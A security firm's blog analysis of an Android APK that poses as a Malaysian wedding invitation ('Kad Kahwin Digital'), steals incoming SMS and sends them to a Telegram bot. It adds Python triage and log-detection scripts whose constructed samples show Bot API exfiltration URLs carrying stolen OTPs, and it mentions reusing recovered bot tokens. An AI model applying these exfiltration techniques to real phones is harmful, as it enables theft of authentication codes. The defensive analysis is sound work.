SMS Stealer APK uses "Kahwin" theme targeting Malaysians: Kad Kahwin Digital APK

This post was authored by Fareed and the DetecX team of Netbytesec.

This blog post is intended to give an overall picture of a malicious Android app campaign believed to be targeted at Malaysians. The threat actor built an Android application that steals and spies on the SMS messages of victims who install it on their Android phones. The application was distributed to victims via WhatsApp, by asking them to install it in order to view a wedding invitation.

This blog post may be useful for security engineers, Android researchers, and security analysts who want to keep up with current mobile malware threats and Malaysian cyber security news. By the end of this post, readers will understand the inner workings of this recent Android malware and what happens on a compromised user's device.

Credit to Mr. Muhammad Kamil, Mr. Fatah, and Mr. Kamarul Baharin from MyCERT and Shaikh Fikri from the Cyber999 team for sharing the APK sample and threat insight with the Netbytesec team.

Non-technical Executive Summary

For a non-technical audience: this is an analysis of a malicious Android application, conducted by the Netbytesec team to understand its behaviour in detail, so that we can verify how scammed victims were compromised (or "hacked") by the scammer through this application once it was installed on their phones. After installation, the malicious app is able to read all of the victim's SMS messages and is also capable of sending SMS messages from the phone. The impact is that sensitive information in the victim's SMS inbox is exposed to the scammer/hacker.

Technical Executive Summary

The NBS (Netbytesec) team recently analysed a lure Android Package Kit (APK) sample that uses a wedding invitation theme as its modus operandi. The malicious Android application was distributed via WhatsApp: the threat actor sends the victim a message with a wedding invitation and an APK file that supposedly has to be downloaded and installed in order to view the invitation card.

Once the malicious APK is installed on the victim's Android phone, it steals every incoming SMS message. This combination of phishing and SMS theft lets the threat actor spy on the victim's SMS content, which could be abused for illegal activities such as accessing online banking or any other service that relies on SMS-based authentication codes.

The NBS malware analysts also noticed indicators suggesting that the actor behind this campaign may originate from Indonesia: Indonesian slang in the malware's command and control channel, and Indonesian telephone numbers embedded in the code.

Figure 1: WhatsApp conversation (credit to owner); the installed APK does not have a name

Graph Flow

Figure 2: Graph Flow of the modus operandi

How threat actors distributed the malware

Based on recent viral posts on social media and in the news, several victims received a WhatsApp message about an invitation to a wedding. The message contains the invitation and asks the targeted user to install an application named "Kad Digital Kahwin.apk" or "Jemputan-Majlis-Perkahwinan.apk" that is sent in the chat. The sender tells the victim that the application must be installed first in order to read the details of the invitation.

If you are interested in reading a Facebook post about one person's experience of the conversation with the threat actor, the post is available here: https://www.facebook.com/story.php?story_fbid=pfbid02Zv4AUVmd6UnoT9KSRMbRqpGqPiDctoiFadW8Gj1AXVUSuKy5as7tdxPoLyBUc8yhl&id=100069476666645&mibextid=Nif5oz

Figure 3: WhatsApp conversation between attacker and victims (Credit to owners of the screenshots)

Reading the WhatsApp conversation in the figure above carefully, the threat actor uses Indonesian slang. This is the first indicator that the threat actor group might be from Indonesia.

Technical Analysis

APK metadata information

Application name: Kad Kahwin Digital
Package Name: com.example.myapplication
MD5 hash: a21bc85e2275c90305d9a2a14d7a6664
Dangerous permissions:
  • android.permission.READ_SMS
  • android.permission.SEND_SMS
  • android.permission.RECEIVE_SMS
From the permissions alone, the application is focused on SMS-related activity, so at first glance this APK already looks like an SMS stealer. Note that a sideloaded APK is not subject to Google Play's SMS permission policy, so the runtime permission prompt is the only gate standing between the app and the inbox.
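As an added example (this is not Netbytesec's tooling or the malware's code), the following Python script performs the offline triage that the metadata above implies: it compares the file's MD5 with the IoC hash from this post, checks whether AndroidManifest.xml still starts with the binary-XML header that decompilers expect, and sweeps the manifest and classes*.dex for the three SMS permissions, a Telegram Bot API token and numbers with the Indonesian +62 prefix. The hash and the host name are from the post; the archive produced by build_constructed_sample() is a fake, non-installable APK made up only to exercise the checks, and its token and phone number are invented.

```python
"""Offline APK triage helper (added example, not Netbytesec tooling).

Checks: MD5 against the post's IoC hash, whether AndroidManifest.xml carries
the binary-XML (AXML) header, and byte sweeps of the manifest and classes*.dex
for SMS permissions, a Telegram Bot API token and Indonesian (+62) numbers.
"""
import hashlib
import io
import json
import re
import sys
import zipfile

IOC_MD5 = "a21bc85e2275c90305d9a2a14d7a6664"  # from the post's IoC list

# Binary XML starts with a ResChunk header: type 0x0003, header size 8,
# both little-endian. apktool/aapt refuse a manifest that lacks this.
AXML_MAGIC = b"\x03\x00\x08\x00"

SMS_PERMISSIONS = (
    "android.permission.READ_SMS",
    "android.permission.SEND_SMS",
    "android.permission.RECEIVE_SMS",
)
# Bot tokens look like "<numeric bot id>:<secret>"; the pattern is kept loose.
TELEGRAM_BOT_RE = re.compile(rb"api\.telegram\.org/bot(\d+:[A-Za-z0-9_-]{30,})")
ID_PHONE_RE = re.compile(rb"\+62\d{8,12}")  # Indonesian country code


def _contains(blob: bytes, text: str) -> bool:
    """AXML string pools are UTF-16LE or UTF-8; DEX strings are ASCII-compatible."""
    return text.encode() in blob or text.encode("utf-16-le") in blob


def triage_apk_bytes(data: bytes) -> dict:
    """Build a small report from the raw APK bytes (an APK is a zip archive)."""
    report = {
        "md5": hashlib.md5(data).hexdigest(),
        "matches_ioc": False,
        "manifest_present": False,
        "manifest_is_axml": False,
        "sms_permissions": [],
        "telegram_bot_tokens": [],
        "indonesian_numbers": [],
    }
    report["matches_ioc"] = report["md5"] == IOC_MD5
    manifest = b""
    with zipfile.ZipFile(io.BytesIO(data)) as apk:
        names = apk.namelist()
        if "AndroidManifest.xml" in names:
            manifest = apk.read("AndroidManifest.xml")
            report["manifest_present"] = True
            report["manifest_is_axml"] = manifest.startswith(AXML_MAGIC)
        dex = b"".join(apk.read(n) for n in names if re.fullmatch(r"classes\d*\.dex", n))
    haystack = manifest + dex
    report["sms_permissions"] = [p for p in SMS_PERMISSIONS if _contains(haystack, p)]
    report["telegram_bot_tokens"] = sorted({m.decode() for m in TELEGRAM_BOT_RE.findall(dex)})
    report["indonesian_numbers"] = sorted({m.decode() for m in ID_PHONE_RE.findall(dex)})
    return report


def triage_apk(path: str) -> dict:
    with open(path, "rb") as fh:
        return triage_apk_bytes(fh.read())


def build_constructed_sample() -> bytes:
    """A fake, non-installable APK constructed only to exercise the checks above."""
    manifest = AXML_MAGIC + b"\x00" * 4 + "android.permission.READ_SMS".encode("utf-16-le")
    dex = b"dex\n035\x00" + b"\x00".join([
        b"android.permission.SEND_SMS",
        b"https://api.telegram.org/bot123456789:AAFexampleTOKENexampleTOKENexample1/sendMessage",
        b"+628123456789",  # invented number, only the +62 prefix matters here
    ])
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", manifest)
        z.writestr("classes.dex", dex)
    return buf.getvalue()


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_constructed_sample()
    print(json.dumps(triage_apk_bytes(data), indent=2))
```

Run it as `python triage.py sample.apk`; without an argument it runs against the constructed sample. A report with manifest_present true but manifest_is_axml false, or a manifest that decompilers reject while the app still installs, is the situation described under Observation below: Android's own parser accepted the manifest, so whatever is broken in it is something Android tolerates and the analysis tools do not, which is why the byte sweep does not depend on parsing the manifest at all.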

Application behavior and interface

When opened for the first time, the application asks the user to set it as the default SMS app, so that it can access SMS content in the background. As the default SMS app it is handed every incoming message, including verification codes, before any other app sees it.

Figure 4: The app requests permission to read, send and view SMS messages

This behaviour can be seen in the decompiled Java code of the APK, in the onCreate method of the MainActivity class.

Figure 5: Permission request's code

Once the permissions are granted, the application opens a WebView that loads https://ejemputan.com/kadkahwindigital, where the user can view the site's contents. The site is a legitimate website owned by the "ejemputan" company, which the attacker uses to give the app convincing, legitimate-looking content.

Figure 6: WebView of the application loading a legitimate website

The code that loads the WebView can also be seen in the onCreate method.

Figure 7: The code that loads the URL of ejemputan.com

After that, the user simply interacts with the WebView interface while the malicious activity runs in the background.

Malicious capabilities

Get device information

In the code, the application first builds a string of concatenated system information consisting of the device's specifications and build details. The threat actor gathers this to profile the victim's device.

Figure 8: The app gathers information about the device specification and stores it in a variable

The device information is then sent to the threat actor's command and control channel, which is hosted on Telegram: the attacker uses a Telegram bot to receive and collect it.

Figure 9: The app communicates with the bot as soon as the victim grants the permissions

After further investigation and analysis, the Netbytesec team was able to retrieve some of the victim device information that had been sent to the Telegram bot, shown below:

Figure 10: This message was sent to the Telegram bot, so the actor knows that a new device has been infected

SMS stealer

When the victim's phone receives an SMS, the application retrieves the message and sends it to the Telegram bot.

Figure 11: Code that does the SMS stealing activity

The code above is part of a ReceiveSMS function that handles incoming SMS messages. It first converts the raw messages into readable form and extracts the sender's address and the message body. The app then sends both to the Telegram bot, which serves as the attacker's communication channel, so the attacker can receive and read the stolen SMS messages directly in a Telegram chat.

For example, here are some victim messages that were sent to the attacker's C2 infrastructure via the Telegram bot:

Figure 12: Incoming messages readable by the attacker, as the application stole them and sent them to the Telegram bot
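Both the device check-in and the SMS theft above go through the Telegram Bot API, whose sendMessage call carries the bot token, the destination chat_id and the text in the request itself. As an added example (not code from the post or from the malware), here is detection logic in Python run over a few constructed proxy-log lines in a simplified "<timestamp> <client> <method> <url>" format; the token, chat id, device model and message contents in SAMPLE_LOG are invented, and your proxy's real log format will differ.

```python
"""Detect Telegram Bot API exfiltration in proxy logs (added example).

Data leaves the phone as
https://api.telegram.org/bot<token>/sendMessage?chat_id=...&text=...
so on decrypted traffic one regex plus query-string parsing recovers the
bot, the destination chat and what was sent.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample, not real traffic. Format: "<ts> <client> <method> <url>".
SAMPLE_LOG = """\
2023-06-12T09:41:03Z 10.0.0.23 GET https://api.telegram.org/bot123456789:AAFexampleTOKENexampleTOKENexample1/sendMessage?chat_id=987654321&text=Model%3A+SM-X000+Android+12
2023-06-12T09:41:41Z 10.0.0.23 GET https://api.telegram.org/bot123456789:AAFexampleTOKENexampleTOKENexample1/sendMessage?chat_id=987654321&text=From%3A+BANK+Msg%3A+Your+OTP+is+123456
2023-06-12T09:42:10Z 10.0.0.45 GET https://ejemputan.com/kadkahwindigital
2023-06-12T09:43:02Z 10.0.0.23 POST https://api.telegram.org/bot123456789:AAFexampleTOKENexampleTOKENexample1/sendMessage
"""

# Bot tokens are "<numeric bot id>:<secret>"; the API method follows the token.
BOT_CALL_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<token>\d+:[A-Za-z0-9_-]{30,})/(?P<method>\w+)"
)


def redact_token(token: str) -> str:
    """Keep the bot id (useful for pivoting) but never write the secret half to alerts."""
    bot_id, _, _secret = token.partition(":")
    return f"{bot_id}:******"


def find_bot_exfil(log_text: str) -> list:
    """Return one record per Bot API call found in the log text."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split(maxsplit=3)
        if len(fields) != 4:
            continue  # malformed line: skip it rather than abort the sweep
        ts, client, verb, url = fields
        m = BOT_CALL_RE.search(url)
        if not m:
            continue
        query = parse_qs(urlsplit(url).query)
        hits.append({
            "ts": ts,
            "client": client,
            "verb": verb,
            "bot": redact_token(m["token"]),
            "method": m["method"],
            "chat_id": query.get("chat_id", [None])[0],
            # parse_qs decodes %xx and '+'. A POST carries these fields in the
            # body, which is only available if the proxy logs request bodies.
            "text": query.get("text", [None])[0],
        })
    return hits


def clients_per_bot(hits: list) -> dict:
    """Map each bot id to the set of internal clients that talked to it."""
    seen = defaultdict(set)
    for h in hits:
        seen[h["bot"].split(":")[0]].add(h["client"])
    return dict(seen)


if __name__ == "__main__":
    found = find_bot_exfil(SAMPLE_LOG)
    for h in found:
        print(h)
    print(clients_per_bot(found))
```

Over TLS, DNS and SNI logs show only api.telegram.org; the /bot<token>/ path and the query string are visible only where traffic is decrypted, or as strings inside the APK. The regular Telegram app speaks MTProto to Telegram's data centres rather than the HTTP Bot API, so a handset calling /bot… endpoints at all is already worth an alert. Because a Bot API token is a bearer credential, a token recovered from a sample gives an analyst the same view of the bot's chat as the operator (the Bot API's getMe and getUpdates methods); that access should be used under your organisation's legal guidance.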

Send SMS

The code below listens for incoming SMS. When an SMS is received, it retrieves the message body and the sender's phone number, then replaces certain characters in the body. If the first part of the message matches a specific number, the victim's phone sends a text message to another phone number containing the remaining parts of the message. Finally, the code informs the Telegram bot that the message was sent successfully. In effect, the inbox doubles as a command channel: the operator can make the infected phone send SMS on the victim's behalf, which is why SEND_SMS is requested alongside the read permissions.

Figure 13: The code that does the sending message activity

In summary, the code monitors incoming SMS messages, extracts their content and sender information, sends a text message when instructed, and informs the Telegram bot about the successful send.

Observation

An interesting aspect of this application is that, once installed, it is hidden from the main app menu of the victim's phone. Netbytesec assumes this is caused by the application having a null name, as shown in the app settings screenshot below, where the application has no name. Note that an empty label by itself does not normally remove an app from the launcher; a missing MAIN/LAUNCHER intent filter or a disabled launcher activity does, and with the manifest unreadable (see below) this could not be confirmed.

Figure 14: The app does not have an application name

Moreover, during the analysis the AndroidManifest.xml file could not be parsed by our tooling. This might be an anti-analysis technique, or simply a bug in the application build. Since the APK installs and runs, the manifest is still valid for Android's own parser, so whatever is malformed is something Android tolerates and the decompilers do not; either way it merits further investigation.

In addition, the Netbytesec team assesses that the threat actor behind this malicious APK campaign is from Indonesia. Both the WhatsApp conversations and the messages in the Telegram bot that hosts their communication contain Indonesian slang. Furthermore, we discovered a phone number embedded in the code that carries the Indonesian country code (+62).

Figure 15: Found a phone number that belongs to the country code of Indonesia

Figure 16: Found a second phone number that belongs to the country code of Indonesia

These findings suggest a potential Indonesian connection to this malicious activity.

Based on the information extracted from the bot's messages, the Netbytesec team was unable to identify any Malaysian phone numbers compromised by the threat actor: the application's check-in only reports device information and carries no victim-related data such as the phone number.

Conclusion

In conclusion, this malicious Android APK poses as a wedding invitation application. The attacker uses a common modus operandi, distributing the APK through WhatsApp. Once installed, the APK steals incoming SMS messages, exposing sensitive information that could be used for illegal activities. Furthermore, the APK gathers device specifications and sends them to the attacker's bot channel hosted on Telegram. There is no sign of code or behaviour that steals banking information directly, so the attacker's purpose in spying on the victim's SMS remains unclear. The Netbytesec team strongly advises Android users to stay alert to malicious APK scams, as this type of campaign has become a trend among attackers who scam and hack people using Android phones.

Indicators of Compromise

Hash (MD5):
  • a21bc85e2275c90305d9a2a14d7a6664
Network:
  • api.telegram.org